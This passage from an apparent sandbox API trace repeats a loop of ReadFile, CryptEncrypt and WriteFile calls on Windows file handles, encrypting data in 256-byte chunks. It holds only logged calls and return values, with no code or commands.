(in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.384] GetLastError () returned 0x0 [0165.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.384] GetLastError () returned 0x0 [0165.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.384] GetLastError () returned 0x0 [0165.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.384] GetLastError () returned 0x0 [0165.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.384] GetLastError () returned 0x0 [0165.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.384] GetLastError () returned 0x0 [0165.384] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.384] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.384] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.384] GetLastError () returned 0x0 [0165.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.385] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.385] GetLastError () returned 0x0 [0165.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.385] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.385] GetLastError () returned 0x0 [0165.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.385] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.385] GetLastError () returned 0x0 [0165.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.385] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.385] GetLastError () returned 0x0 [0165.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.385] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.385] GetLastError () returned 0x0 [0165.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.385] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.385] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.385] GetLastError () returned 0x0 [0165.385] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.386] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.386] GetLastError () returned 0x0 [0165.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.386] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.386] GetLastError () returned 0x0 [0165.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.386] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.386] GetLastError () returned 0x0 [0165.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.386] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.386] GetLastError () returned 0x0 [0165.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.386] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.386] GetLastError () returned 0x0 [0165.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.386] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.386] GetLastError () returned 0x0 [0165.386] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.386] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.386] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.387] GetLastError () returned 0x0 [0165.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.387] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.387] GetLastError () returned 0x0 [0165.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.387] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.387] GetLastError () returned 0x0 [0165.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.387] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.387] GetLastError () returned 0x0 [0165.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.387] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.387] GetLastError () returned 0x0 [0165.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.387] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.387] GetLastError () returned 0x0 [0165.387] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.387] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.387] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.388] GetLastError () returned 0x0 [0165.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.388] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.388] GetLastError () returned 0x0 [0165.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.388] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.388] GetLastError () returned 0x0 [0165.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.388] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.388] GetLastError () returned 0x0 [0165.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.388] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.388] GetLastError () returned 0x0 [0165.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.388] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.388] GetLastError () returned 0x0 [0165.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.388] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.388] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.388] GetLastError () returned 0x0 [0165.388] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.389] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.389] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: 